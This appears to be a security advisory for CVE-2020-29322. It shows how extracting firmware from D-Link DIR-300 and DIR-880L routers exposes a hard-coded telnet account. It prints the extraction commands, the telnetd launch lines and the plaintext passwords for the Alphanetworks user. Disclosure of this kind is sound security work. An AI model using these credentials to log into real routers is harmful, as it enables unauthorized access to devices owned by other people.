CVE-2020-29322

A series of old D-Link routers are vulnerable to credentials disclosure in telnet service through decompilation of firmware, allowing an unauthenticated attacker to access the telnet service.

Confirmed devices and firmware versions:

Device Name	Firmware Version	Release Date
DIR-300	2.06 (latest)	2015/04/24
DIR-880L	1.07 (latest)	2016/05/25

DIR-300

Download DIR-300 firmware version 2.06 and extract it using binwalk.

N/ABASH

binwalk -e dir300b_v2.06_f4la.bin

The username Alphanetworks is hard-coded in etc/scripts/misc/telnetd.sh:

N/ABASH

telnetd -l "/usr/sbin/login" -u Alphanetworks:$image_sign -i $lf &

The password is stored in etc/config/image_sign:

N/ABASH

wrgn23_dlwbr_dir300b

DIR-880L

Download DIR-880L firmware version 1.07 and extract it using binwalk.

N/ABASH

binwalk -e DIR880A1_FW107WWb08.bin

The username Alphanetworks is hard-coded in etc/init0.d/S80telnetd.sh:

N/ABASH

telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &

The password is stored in etc/config/image_sign:

N/ABASH

wrgac16_dlink.2013gui_dir880

██╗ ██████╗ ███████╗██╗███████╗███╗ ██╗██████╗ ██║██╔═══██╗██╔════╝██║██╔════╝████╗ ██║██╔══██╗ ██║██║ ██║█████╗ ██║█████╗ ██╔██╗ ██║██║ ██║ ██║██║ ██║██╔══╝ ██║██╔══╝ ██║╚██╗██║██║ ██║ ██║╚██████╔╝██║ ██║███████╗██║ ╚████║██████╔╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═══╝╚═════╝